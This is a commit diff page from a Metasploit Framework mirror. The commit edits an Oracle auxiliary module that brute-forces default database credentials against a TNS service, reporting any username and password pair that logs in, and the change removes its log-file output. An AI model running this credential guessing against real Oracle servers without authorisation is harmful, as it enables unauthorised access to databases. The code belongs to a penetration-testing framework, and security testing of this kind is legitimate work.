infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

removed writing to a file. only print if get a hit. 

git-svn-id: file:///home/svn/framework3/trunk@7710 4d416f70-5f16-0410-b530-b9f4589650da
unstable
Mario Ceballos 2009-12-04 23:54:14 +00:00
parent 43f65b2851
commit 3358b9113f
1 changed files with 5 additions and 11 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

16
modules/auxiliary/admin/oracle/login_brute.rb
View File

@ -15,20 +15,16 @@ class Metasploit3 < Msf::Auxiliary
def initialize(info = {}) def initialize(info = {})
super(update_info(info, super(update_info(info,
'Name' => 'Oracle brute forcer for known default accounts.', 'Name' => 'Oracle Account Discovery.',
'Description' => %q{ 'Description' => %q{
This module uses a list of well known authentication credentials This module uses a list of well known default authentication credentials
for bruteforcing the TNS service. A log file of discoverd credentials to discover easily guessed accounts.
can be found in ./data/wordlists/oracle_default_found.log.
Oracle default passwords in oracle_default_passwords.csv.
McKesson HCI Oracle default passwords in hci_oracle_passwords.csv.
}, },
'Author' => [ 'MC' ], 'Author' => [ 'MC' ],
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'Version' => '$Revision$', 'Version' => '$Revision$',
'References' => 'References' =>
[ [
[ 'URL', 'https://www.metasploit.com/users/mc' ],
[ 'URL', 'http://www.petefinnigan.com/default/oracle_default_passwords.csv' ], [ 'URL', 'http://www.petefinnigan.com/default/oracle_default_passwords.csv' ],
[ 'URL', 'http://seclists.org/fulldisclosure/2009/Oct/261' ], [ 'URL', 'http://seclists.org/fulldisclosure/2009/Oct/261' ],
], ],
@ -46,6 +42,8 @@ class Metasploit3 < Msf::Auxiliary
def run def run
list = datastore['CSVFILE'] list = datastore['CSVFILE']
print_status("Starting brute force on #{datastore['RHOST']}:#{datastore['RPORT']}...")
fd = CSV.foreach(list) do |brute| fd = CSV.foreach(list) do |brute|
datastore['DBUSER'] = brute[2].downcase datastore['DBUSER'] = brute[2].downcase
@ -55,7 +53,6 @@ class Metasploit3 < Msf::Auxiliary
connect connect
disconnect disconnect
rescue ::OCIError => e rescue ::OCIError => e
print_error("#{e.class} #{e.to_s}")
else else
if (not e) if (not e)
report_note( report_note(
@ -65,10 +62,7 @@ class Metasploit3 < Msf::Auxiliary
:type => 'ORACLE_BRUTEFORCED_ACCOUNT', :type => 'ORACLE_BRUTEFORCED_ACCOUNT',
:data => "#{datastore['DBUSER']}/#{datastore['DBPASS']} with sid #{datastore['SID']}" :data => "#{datastore['DBUSER']}/#{datastore['DBPASS']} with sid #{datastore['SID']}"
) )
found = File.open(File.join(Msf::Config.log_directory,"oracle_default_found.log"), "a")
print_status("Found user/pass of: #{datastore['DBUSER']}/#{datastore['DBPASS']} on #{datastore['RHOST']} with sid #{datastore['SID']}") print_status("Found user/pass of: #{datastore['DBUSER']}/#{datastore['DBPASS']} on #{datastore['RHOST']} with sid #{datastore['SID']}")
found.write "Found user/pass of: #{datastore['DBUSER']}/#{datastore['DBPASS']} on #{datastore['RHOST']} with sid #{datastore['SID']}.\n"
found.close
end end
end end
end end